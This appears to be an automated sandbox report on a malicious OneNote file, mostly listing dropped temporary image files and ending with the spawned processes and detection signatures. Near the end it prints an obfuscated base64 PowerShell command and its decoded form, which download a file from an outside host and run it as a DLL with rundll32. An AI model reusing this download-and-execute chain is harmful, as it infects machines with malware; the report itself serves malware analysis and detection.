PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2D111B9E-F79A-4647-B3FB-EAC9183F09A3}.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2DC2D18A-2AE4-4E6E-9892-1808B65C78F3}.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2E5666FF-E386-4C9B-8F06-84D165C87F76}

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2E6A69E8-64A0-4702-9194-3F1E59ADC584}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2EBB9041-6E91-42DE-90CF-889C70CC8950}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3637C9C3-640D-4AC7-A7C8-926DF710FC58}

GIF image data, version 89a, 1012 x 327

dropped

C:\Users\user\AppData\Local\Temp\{3E1590AC-8C97-4DAB-8BCF-0C4E8711749C}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3E1E0AA9-3948-4D1D-AADD-BA4FFA111CCF}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3E5E16D0-D9AF-4DB3-9BDC-D909D4138C11}.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3F5131D0-2964-4B33-9F49-08BF23A57A81}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{3F5DB1C9-193B-46A8-ADE9-665B90899D2D}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4170D8C0-B872-4CCF-A71B-A1E30E7A125D}.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{451A3E96-B4B9-4608-80E7-17D276D6A423}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{45442089-EEE3-4B55-9CA2-F0BE31F7A074}.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{45A4ECBE-D65A-49F1-AAC5-8C26993226D8}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{462D736E-D37E-47A1-9656-C7A3222DF69D}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{469906D9-9BBB-4454-8D26-DEF16D12D9E2}.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{47DABD16-94DA-4D43-813B-10B0ADFDA7D2}

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4821CED6-C57A-44EB-8A86-4CB5DB0FD8D2}

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4888551E-F554-438E-959C-17D0886467D2}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4D46DD88-9301-4883-91D8-CF46A6632E36}

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4E869C6D-6CA5-4EB9-87AF-AE2DA89ED907}.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4F8EBC52-7DDC-44B6-A286-F30F71FF3FD3}.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{52BD32A9-8165-4689-A8E4-716B9AF418B0}.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5371EF46-8412-45EF-B7EC-31E13AA9BC6E}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{55104584-63BB-482C-86C3-C28AE73F1B11}

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5589BEE2-ECE2-4A2D-8AC4-085C2EF35152}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{571B89A0-FF88-4410-8386-831D58453715}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{57501545-60CA-4E8F-9031-C81FD814DB9D}

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{576861ED-7505-4CA6-BCD6-90BB2045D354}.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{579900EB-EC14-498B-87BE-57A18E6191BB}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{588FA160-4304-4A41-BAB3-424583F3F3BC}.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{59128DE0-12F9-45BA-9695-5A0845EBE1CD}.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{592BA7D2-11DF-499C-B321-93335149D3F4}.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5C66C960-C533-4858-B269-049115105359}

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5D058A82-29B4-46DD-903B-59E5CC7089AB}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5E5FC786-060F-4AE1-B290-184184093952}.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{609777D3-B74F-4990-89DE-F84B440DC8F2}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{62BE44C8-C234-4F4D-AB94-D581F1FC9DB2}.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{62E48AF2-A111-4F81-90A5-2E7F22FC0E19}.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{63C4FC4A-57CF-466A-8908-8FB627C644A2}.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{64444716-09CF-4B8E-9056-C3866ABC232D}.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{65924EE9-BD13-4DDE-A74A-101DA5B21B97}.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{65DEF586-789B-463D-B21C-382D57F5C674}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6642D17A-3B38-4103-97C0-7263984300B4}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6808A2FB-C994-4284-9857-28460758B905}

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6A41B7F8-C72A-4BA0-B7CB-F01FD40058B3}.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6AA7C499-8B9B-4199-BBE0-E5464D936F3E}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6E3DE7B1-9BA7-456D-BF90-CE424E8C19B6}

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{70BF80DF-3D5F-4D88-96EF-54CC2731F972}.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{72927BDE-CC4B-44CB-8968-221AC03D3C39}.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{72AB6C91-896E-471B-ABC0-29FCF8FE0903}.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{74C535CB-BA50-4B7F-B394-543854CAB85D}.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{75FC24AE-FA4D-45F7-9E1C-78C330E876AA}

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{76CB4CB5-C05B-4719-A520-DC64982444FE}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{7FEE891F-F757-43E9-95EB-33E61F52EAA6}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{818DD083-FBDC-40F9-98EA-F25C71604FC5}.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{83203535-F5CE-4285-8307-77B5C31C5FA6}.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{83F21CF8-471C-4F66-8664-7CC73738CFBC}

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{86650956-1396-486F-85F5-3A56329C9716}.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{871E0D58-08D4-4339-8C20-658D87460E97}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{8967BA46-B370-451A-8CEF-1613067796B5}.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{89F2A1AB-B17B-4719-B59F-45F55C0ED4F7}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{8D8EC411-99E8-48E6-ADBA-594667D62ABA}

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{8E0E3D61-6878-4E2E-A443-7B33EB366DD0}

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{924AF9BE-1999-4E54-8BE9-050A0421CAF3}.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{93885A54-8B09-4F11-8175-6110ECBC26B4}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9631D0C7-D35A-4006-80B8-4A6E31C535B2}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{96CB5ADE-2EC4-4B57-92B3-A1B95C828887}.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{99AF8CF4-D36D-4866-AA8C-05735BC1C9EB}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{99CCE4A0-385E-4890-AE48-41C445FBA682}

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9A7CE641-13D8-4994-B0CA-286F36739626}

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9AC8A009-2CEA-4D7D-8DF7-DE756847AFC8}

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9AEA1C62-7B7D-404F-AFCB-FB093F02BC23}.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9B084582-4890-4303-B7CD-E4F5D128FADB}.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9C341BBF-A93E-4309-B590-DACBD6D13299}

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9C8B0398-CE20-4CBE-B0C1-7499DD8A7DF2}

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9EEE4ABA-A596-4639-889F-712CD64F7BCE}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9F71642F-04CF-4DAE-B6F5-17AA24616C3B}.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9F80252E-A71F-4B7E-AB8C-51CC2878DD32}.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{A0D60D5C-D7DE-4E5F-98A0-9484893279AA}

ASCII text, with very long lines (372), with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\{A0F20B21-0D6D-480A-B950-A174DFAFEB22}

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{A8C0D073-1204-4E0D-97F0-6BBC44EF7282}.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{A8CEB3B3-53F2-4A14-B3E3-951914E6E7F5}

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{A96AAEEA-BC15-4631-BCBA-81C3F4584AEB}.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{ABAD0A8C-4F04-4D89-A9AF-AAA1C7D3E388}.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{AEE092A0-BFB4-49AF-89D0-F2154DBA479A}

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{AFEC24F9-6178-4E4C-8D3E-6CE97C7EABC5}

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{B04438C1-CEB7-4197-91A1-D10164D89C6D}.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{B0E724BB-75A7-4227-89CF-8B794D4AEF20}.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{B8A26195-F9C1-4652-9F0E-B091C6A4DF0B}

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{B8D86819-BFCA-4C5B-B365-53BCFE86C42A}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{B9563878-82F5-44C1-9813-AB1F782914D1}

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BA54430A-DB9B-4BA0-8B71-6235892D496C}

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BA5EE99F-8C9D-4567-997B-6A096E0B9A4E}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BAAA38D3-4793-4D52-A749-E555EA4468F7}

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BB936535-45C5-4061-873D-06D521896D4C}.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BBB50089-D536-4269-A715-A9F655C662A3}

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{BD7894B7-7C67-4EBC-8E6A-16E3204DE88D}

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C37CB9B2-25F8-463E-BA11-6A95481D6BA7}.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C496AB18-8746-4AD0-88B1-133E84254A94}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C73302CD-A010-499C-86B5-5198E61E8D7F}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C983F922-2F27-4C14-9DFE-DD35917DC9CC}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{CB2AB54C-A297-41D7-81E1-2757972E07DE}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{CB54C77B-0214-42D5-AB85-3A393DC63EF3}

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{CBABFDE1-6BBE-43FD-BA47-E39F5076E19C}.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{CCD18F24-4AC6-40EA-B992-FC3C0FAE60CA}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D308D389-B65C-4791-9FE6-4A774F84B21B}

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D88B87E7-FAA9-4FC8-9E12-A7A3CEBC4506}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D94710B0-069B-4BDC-838C-063CE0655F09}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{DDD5D422-ABC1-47FD-AF28-F7A792E1DC28}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{DEDEEA04-619C-4020-9769-7DE0CD14B160}

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{E8D1F82C-4A0B-4003-A21F-3EE7CD266809}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{E9319BF7-E9E7-44AC-8EB5-3C0F312FAA30}

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EB5EC939-AF65-4B82-A15C-E8448EB7CF19}

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EB65E805-D393-42D2-973F-27B805513FA7}.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EBE37427-A208-4DD1-95D0-0F47DE7E5B43}

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{ED55F159-68F5-4966-B560-1E7FE8BFD1F8}.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EDDCBD3A-B136-4E2C-B697-CF22AC4579C2}

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EEDB1528-5280-4554-A684-B515CB7987DD}.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{EEFB8C19-B408-462C-A17E-C7DBFADA5015}

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F36F0537-9D20-4390-9EC6-2D1AA2CC9790}.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F66BEA49-4A57-4978-8A2C-8E1302D6AF82}

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F738F501-17B9-462B-B111-43A39B2ECBEA}

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F778F4F7-1BFE-4B7F-8503-410F443F91FC}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F794AD99-3F51-417C-BFCB-7C924053727A}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F8834DE5-0E6E-490C-ACD6-23D1F81133D7}.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F924DE40-D7C5-4099-A702-9ED9FAE8AC12}

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F9753E7D-73AC-4CAF-9E39-A0E088FC3E53}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FAA44344-2C3E-496E-994B-4AF6853B02FA}.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FB2EE13B-F817-4FC6-B2E2-D84FD8BC051C}

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FB337C79-11CC-4E37-89F4-15AA6C1F0230}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FEC04CEE-032C-46B1-8E29-C90A05EE6A84}

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FFA84DA8-2022-42CB-9F56-9EC206F00F40}

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S1NW5J7K0BC7F9ORQZ0V.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Wed Feb 8 02:53:44 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide

dropped

There are 317 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one

Details

Is windows:	true
Is dropped:	false
PID:	2956
Target ID:	0
Parent PID:	3452
Name:	ONENOTE.EXE
Class:	office
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one
Size:	1676072
MD5:	8D7E99CB358318E1F38803C9E6B67867
Time:	19:53:21
Date:	07/02/2023
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x830000
Modulesize:	1695744
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "

Details

Is windows:	true
Is dropped:	false
PID:	6096
Target ID:	1
Parent PID:	3452
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Size:	273920
MD5:	4E2ACF4F8A396486AB4268C94A6A245F
Time:	19:53:26
Date:	07/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff707bb0000
Modulesize:	405504
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute DLL with spoofed extension	Data Obfuscation
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))

Details

Is windows:	true
Is dropped:	false
PID:	2104
Target ID:	3
Parent PID:	6096
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Size:	447488
MD5:	95000560239032BC68B4C2FDFCDEF913
Time:	19:53:26
Date:	07/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff703e80000
Modulesize:	458752
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd

Details

Is windows:	true
Is dropped:	false
PID:	1404
Target ID:	4
Parent PID:	6096
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Size:	273920
MD5:	4E2ACF4F8A396486AB4268C94A6A245F
Time:	19:53:30
Date:	07/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff707bb0000
Modulesize:	405504
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute DLL with spoofed extension	Data Obfuscation
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg

Details

Is windows:	true
Is dropped:	false
PID:	3924
Target ID:	6
Parent PID:	1404
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg
Size:	447488
MD5:	95000560239032BC68B4C2FDFCDEF913
Time:	19:53:31
Date:	07/02/2023
Reason:	newprocess
Reputation:	timeout
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff703e80000
Modulesize:	458752
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

rundll32 C:\programdata\putty.jpg,Wind

Details

Is windows:	true
Is dropped:	false
PID:	5564
Target ID:	11
Parent PID:	1404
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	rundll32 C:\programdata\putty.jpg,Wind
Size:	69632
MD5:	73C519F050C20580F8A62C849D49215A
Time:	19:53:33
Date:	07/02/2023
Reason:	newprocess
Reputation:	timeout
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff649500000
Modulesize:	90112
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute DLL with spoofed extension	Data Obfuscation
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Runs a DLL by calling functions	System Summary	Rundll32
